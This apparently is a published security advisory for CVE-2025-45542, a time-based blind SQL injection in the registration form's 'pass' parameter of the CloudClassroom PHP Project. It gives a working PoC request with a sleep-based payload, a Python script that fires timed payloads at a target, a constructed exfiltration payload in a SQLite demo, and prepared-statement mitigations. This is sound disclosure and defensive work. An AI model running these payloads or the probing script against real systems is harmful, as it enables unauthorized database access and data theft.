@sanjay70023
Last active May 30, 2025 17:06
🔒 Security Advisory: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0

CVE ID: CVE-2025-45542
Advisory Publication Date: [To be updated upon release]
Vulnerability Type: SQL Injection (Time-Based Blind)
Severity: High
Attack Vector: Remote
Status: Unpatched as of disclosure
Discoverer: Sanjay Singh


📘 Summary

A time-based blind SQL injection vulnerability has been discovered in the registrationform endpoint of the CloudClassroom PHP Project v1.0. The pass parameter is neither validated nor parameterized before it is used in a SQL query, so an attacker can inject arbitrary SQL logic into the statement. Because the response carries no query output, results are inferred from response timing (a sleep() call that fires only when an attacker-chosen condition is true), one bit per request. Depending on the database account's privileges and the server configuration, this can lead to data exfiltration, authentication bypass, or even remote code execution.


🎯 Affected Product

  • Vendor: CloudClassroom PHP Project
  • Version: v1.0
  • Component: registrationform endpoint
  • Vulnerable Parameter: pass (in HTTP POST request)

🧪 Proof of Concept (PoC)

HTTP Request (body shown on one line; the form fields are as captured):

POST /CloudClassroom-PHP-Project-master/registrationform HTTP/1.1
Host: localhost
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/CloudClassroom-PHP-Project-master/
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=ct1bl32iroa3t76clsj3osvjqs
Content-Length: 225

addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&email=testing%40example.com&faname=pHqghUme&fname=pHqghUme&gender=Female&lname=pHqghUme&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z&phno=94102&sub

Observation:

  • The response is delayed by about 6 seconds, matching the sleep(6) in the payload, which confirms the injection point.
  • How the payload works (URL-decoded): u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z. The first ' closes the string literal the application builds around pass; XOR(if(now()=sysdate(),sleep(6),0)) is then evaluated as part of the INSERT (now()=sysdate() is almost always true in MySQL, so sleep(6) runs); and XOR'Z reopens a string literal so the statement still parses and the server returns normally.
  • Check before reporting: repeat the request with sleep(0) as a control and with another value such as sleep(3); the extra delay should track the requested value. A single slow response can be network or server jitter.
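
The scaled-delay check described above, written out as an added example (this is not code from the CloudClassroom project or from the advisory). The form fields and the pass payload are taken from the PoC request; the target URL passed to http_sender is the PoC endpoint and is an assumption about where the form posts; simulated_backend is a constructed stand-in for the server so the harness runs offline, and the demo under __main__ uses it.

```python
"""Confirm a time-based blind SQLi finding with a control request and scaled delays."""
import re
import time
import urllib.parse
import urllib.request
from typing import Callable

# Benign field values copied from the PoC request body.
BASE_FORM = {
    "addrs": "3137 Laguna Street", "course": "1", "dob": "1967/1/1",
    "email": "testing@example.com", "faname": "pHqghUme", "fname": "pHqghUme",
    "gender": "Female", "lname": "pHqghUme", "phno": "94102",
}


def build_payload(seconds: float, prefix: str = "u]H[ww6KrA9F.x-F0") -> str:
    """Same shape as the advisory payload: the leading quote closes the string
    literal, XOR(if(...)) is evaluated inside the statement, and XOR'Z reopens a
    literal so the INSERT still parses. now()=sysdate() is (practically) always
    true in MySQL, so sleep(N) runs only if pass is concatenated into the SQL."""
    return f"{prefix}'XOR(if(now()=sysdate(),sleep({seconds}),0))XOR'Z"


def build_body(seconds: float) -> str:
    """URL-encoded POST body with the timing payload in the pass field."""
    return urllib.parse.urlencode({**BASE_FORM, "pass": build_payload(seconds)})


def http_sender(url: str) -> Callable[[str], None]:
    """Real transport: POSTs the body to url (assumed to be the registrationform endpoint)."""
    def send(body: str) -> None:
        req = urllib.request.Request(
            url, data=body.encode(), method="POST",
            headers={"Content-Type": "application/x-www-form-urlencoded"})
        urllib.request.urlopen(req, timeout=60).read()
    return send


def simulated_backend(vulnerable: bool) -> Callable[[str], None]:
    """Constructed stand-in for the server: a vulnerable backend honours the
    sleep() spliced into pass; a parameterized one stores the string and returns."""
    def send(body: str) -> None:
        pw = urllib.parse.parse_qs(body)["pass"][0]
        m = re.search(r"sleep\(([0-9.]+)\)", pw)
        if vulnerable and m:
            time.sleep(float(m.group(1)))
    return send


def timed(send: Callable[[str], None], body: str) -> float:
    """Wall-clock seconds for one request."""
    t0 = time.monotonic()
    send(body)
    return time.monotonic() - t0


def confirm_time_based(send: Callable[[str], None], delays=(3.0, 6.0), tolerance=1.0) -> dict:
    """Measure a sleep(0) control, then each requested delay. The finding is
    confirmed only if every extra delay tracks the requested value, which a
    single slow or jittery response cannot reproduce."""
    baseline = timed(send, build_body(0))
    extra = {d: timed(send, build_body(d)) - baseline for d in delays}
    confirmed = all(abs(extra[d] - d) <= tolerance for d in delays)
    return {"baseline": baseline, "extra": extra, "confirmed": confirmed}


if __name__ == "__main__":
    # Offline demonstration against the simulated backends; for a live test use
    # http_sender("http://localhost/CloudClassroom-PHP-Project-master/registrationform").
    print(confirm_time_based(simulated_backend(True), delays=(0.5, 1.0), tolerance=0.2))
    print(confirm_time_based(simulated_backend(False), delays=(0.5, 1.0), tolerance=0.2))
```

Against a real target keep the default 3 s and 6 s delays with a 1 s tolerance; the smaller values in the demo only keep the offline run short. A negative result from this harness does not prove the parameter is safe (the query may not reach MySQL, or sleep may be filtered); it only means the timing oracle was not reproduced.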

🎯 Impact

  • SQL query injection into the registration INSERT statement
  • User data exfiltration (blind: one bit per timed request, so slow but complete)
  • Authentication bypass
  • Possible remote code execution, only where the database account holds file-write or similar privileges (e.g. MySQL FILE) and the server configuration allows writing to a web-served path

πŸ›‘οΈ Mitigation

✅ Use Prepared Statements (the actual fix):

$password = $_POST['pass'] ?? '';                               // raw, untrusted value
$stmt = $conn->prepare("INSERT INTO users (pass) VALUES (?)");  // placeholder, no string building
$stmt->bind_param("s", $password);                              // sent as data, never parsed as SQL
$stmt->execute();
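
To show why the placeholder matters, here is an added example (not the CloudClassroom code) that runs the vulnerable construction beside the parameterized one. It uses SQLite because it runs offline; SQLite has no sleep() or XOR, so a constructed exfiltration payload using || (string concatenation) stands in for the advisory's timing trick, and the advisory payload itself is included to show that under parameterization it is stored verbatim. The users and secrets tables and the api_key value are constructed for the demo.

```python
"""Concatenated SQL versus a bound parameter, on the same registration INSERT."""
import sqlite3

# The PoC value, URL-decoded.
ADVISORY_PAYLOAD = "u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z"
# Constructed SQLite payload: closes the literal, splices in a subquery, reopens it.
EXFIL_PAYLOAD = "x'||(SELECT api_key FROM secrets LIMIT 1)||'y"


def fresh_db() -> sqlite3.Connection:
    """In-memory database with a constructed schema and one secret to leak."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, pass TEXT NOT NULL);
        CREATE TABLE secrets (api_key TEXT);
        INSERT INTO secrets VALUES ('s3cr3t-key');
    """)
    return conn


def register_vulnerable(conn: sqlite3.Connection, password: str) -> None:
    """The pattern the advisory describes: the value is spliced into the SQL text."""
    conn.execute(f"INSERT INTO users (pass) VALUES ('{password}')")


def register_fixed(conn: sqlite3.Connection, password: str) -> None:
    """Equivalent of prepare(...) + bind_param("s", $password): a placeholder, value bound separately."""
    conn.execute("INSERT INTO users (pass) VALUES (?)", (password,))


def stored_pass(conn: sqlite3.Connection) -> str:
    """What actually landed in the users table."""
    return conn.execute("SELECT pass FROM users ORDER BY id DESC LIMIT 1").fetchone()[0]


def demo(register) -> dict:
    """Run one registration routine against both payloads and return the stored
    value (or the database error), so the two behaviours can be compared."""
    out = {}
    for name, payload in (("exfil", EXFIL_PAYLOAD), ("advisory", ADVISORY_PAYLOAD)):
        conn = fresh_db()
        try:
            register(conn, payload)
            out[name] = stored_pass(conn)
        except sqlite3.Error as e:
            out[name] = f"error: {e}"
    return out


if __name__ == "__main__":
    # Vulnerable: the subquery runs and its result is written into the row;
    # the MySQL-specific advisory payload is a syntax error on SQLite (on MySQL it would sleep).
    print(demo(register_vulnerable))
    # Fixed: both payloads are stored as the literal strings the user submitted.
    print(demo(register_fixed))
```

With register_vulnerable the stored password becomes xs3cr3t-keyy, i.e. the secret was pulled into a row the attacker controls; with register_fixed the stored value is exactly the submitted string, quotes and all, because the driver never interprets it as SQL. Hashing the password before storage is a separate improvement not shown here.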

✅ Validate and Encode Inputs:

  • Validate each field against its expected shape (e-mail format, numeric phno, fixed set of gender values) before it reaches the query.
  • mysqli_real_escape_string() is only a fallback for legacy code that still builds SQL strings; it is not a substitute for prepared statements.
  • htmlspecialchars() protects output rendered into HTML (against XSS), not SQL; do not rely on it for this issue.

✅ Deploy a WAF:

  • Detect and block common SQLi payloads (sleep(, benchmark(, sysdate()) as defence in depth. A WAF reduces noise but does not fix the query construction and can be bypassed with alternative encodings or functions.

✅ Limit DB Permissions:

  • Follow the principle of least privilege: the web application's database account needs only INSERT/SELECT on its own tables, never FILE, SUPER, or access to other schemas. This does not stop the injection itself, but it removes the file-write path to code execution.

📚 References


πŸ™ Acknowledgement

Reported by: Sanjay Singh
